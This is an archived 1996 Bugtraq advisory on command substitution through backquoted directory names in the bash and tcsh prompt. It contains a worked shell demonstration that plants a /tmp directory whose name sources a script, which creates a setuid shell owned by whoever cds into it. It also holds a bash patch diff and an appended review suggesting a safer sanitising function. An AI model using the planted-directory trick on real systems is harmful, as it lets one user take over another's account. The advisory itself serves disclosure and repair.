Bugtraq mailing list archives
Vulnerability in expansion of PS1 in bash & tcsh
From: bethery () info enserb u-bordeaux fr (BETHERY Olivier)
Date: Thu, 19 Sep 1996 20:52:26 +0200
From: test (butafuco () MC NET)
Date: Fri, 13 Sep 1996 09:03:00 -0500

A vulnerability exists in tcsh (tcsh 6.05, or the one that's being handed out with BSDI anyway.) that allows the execution of arbitrary commands when changing into directories that are enclosed with backticks. The problem might also prove to be quite bad to tcsh scripts that find themselves changing into directories on the fly. Here is probably one of the dumbest methods possible that could be used to exploit this weakness.

----------------------------Cut to Bad guy--------------------------------
jim% whoami
Evol bad guy
jim% mkdir /tmp/\`source\ .WaReZ\`
jim% echo echo #\\\!/bin/sh \> .\$\$ > /tmp/*W*/.WaReZ
jim% echo echo sh \> .\$\$ >> /tmp/*W*/.WaReZ
jim% echo chmod 4755 .\$\$ >> /tmp/*W*/.WaReZ
jim% chmod +x /tmp/*W*/.WaReZ
---------------------------Cut to unsuspecting foo------------------------
jim% whoami
Unsuspecting foo
jim% echo $SHELL
/bin/tcsh
jim% I just like to check that sometimes.
jim% Hey, I'm bored maybe I'll check /tmp for some neato stuff
jim% cd /tmp
jim% ls
`source .WaReZ`
jim% OH BOY!!! the jack pot!
jim% cd *WaReZ*
jim% ls
jim% oh, oh well maybe I'll check later...
jim% cd $HOME
----------------------------Cut to More Bad guy--------------------------
jim% ls -a /tmp/*W*/
. .. .24753
jim% /tmp/*W*/.24753
$whoami
unsuspecting foo
$ hah.
---------------------------End Unix Parable-------------------------------
The backquotes (antiquotes) trigger the expansion procedure, so the expression between them is evaluated. This expansion runs whenever the PS1 variable has to be evaluated, after a cd command for example. So if the string between the backquotes is a command line, that line is executed with the UID of the user running the cd command.

A first fix for bash (not tested with tcsh): do not use PS1, and do not include . in your path.

A second available fix for bash (not tested with tcsh), first release, can be improved:

*** bash-1.14.7/parse.y Mon Aug 26 17:15:55 1996 --- bugfixed-bash/bash-1.14.7/parse.y Thu Sep 19 16:20:58 1996 *************** *** 2719,2727 **** #define EFFICIENT #ifdef EFFICIENT char *polite_directory_format (), t_string[MAXPATHLEN]; ! temp = get_string_value ("PWD"); ! if (!temp) getwd (t_string); else --- 2719,2733 ---- #define EFFICIENT #ifdef EFFICIENT char *polite_directory_format (), t_string[MAXPATHLEN]; ! char *mutmp; temp = get_string_value ("PWD"); ! /* BUGFIX -mu */ ! mutmp=temp; ! while (*mutmp != '\0') { ! if (*mutmp == '`') ! *mutmp='%'; ! mutmp++; ! } if (!temp) getwd (t_string); else

_______________
BETHERY Olivier
email: bethery () info enserb u-bordeaux fr
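Review bot: the NULL check on `temp` comes too late: `mutmp=temp;` and the `while (*mutmp != '\0')` loop dereference the pointer before the existing `if (!temp) getwd (t_string);` branch runs, so a shell whose PWD variable is unset (the very case that branch exists for) will crash on the first `*mutmp`. Move the substitution loop below the `if (!temp)`/`else` and apply it to whichever string actually ends up in the prompt, `temp` in the `else` branch or the `getwd` result in `t_string`. A second problem in the same hunk: `temp` points at the value returned by `get_string_value ("PWD")`, so the loop rewrites the shell variable's own storage rather than a copy, and `$PWD` as seen by the user will afterwards contain `%` where the directory name had backquotes; copying into a local buffer before substituting avoids that side effect. Finally, only the backquote character is neutralised; it is worth checking whether the `$(...)` form of command substitution needs the same treatment in this expansion path.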
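As an added example (my own code, not the post's patch or bash's source), here is a copying variant of the same fix: it rejects a NULL PWD before any dereference, writes into a caller-supplied buffer instead of the variable's own storage, and replaces `$` as well as the backquote so that the `$(...)` form of command substitution is covered too. The function name sanitize_prompt_dir, its return convention and the use of `$` as a second trigger character are my assumptions; the `%` placeholder follows the original patch.

```c
#include <stddef.h>
#include <string.h>

/* Hypothetical hardened replacement for the in-place loop in the patch.
 * Copies the directory name into `out` (capacity `outlen`), replacing the
 * characters that would start a command substitution when the prompt is
 * re-expanded: the backquote and the dollar sign (for the $(...) form).
 * A NULL input (PWD unset) is handled before any dereference.
 * Returns 0 on success, -1 on NULL input or if `out` is too small. */
int sanitize_prompt_dir(const char *pwd, char *out, size_t outlen)
{
    size_t i = 0;

    if (pwd == NULL || out == NULL || outlen == 0)
        return -1;

    for (; *pwd != '\0'; pwd++) {
        if (i + 1 >= outlen)
            return -1;              /* keep room for the terminator */
        switch (*pwd) {
        case '`':
        case '$':
            out[i++] = '%';         /* same placeholder as the original patch */
            break;
        default:
            out[i++] = *pwd;
        }
    }
    out[i] = '\0';
    return 0;
}
```

The caller then feeds `out`, not the raw PWD value, to the prompt decoder, so the shell variable itself is never modified.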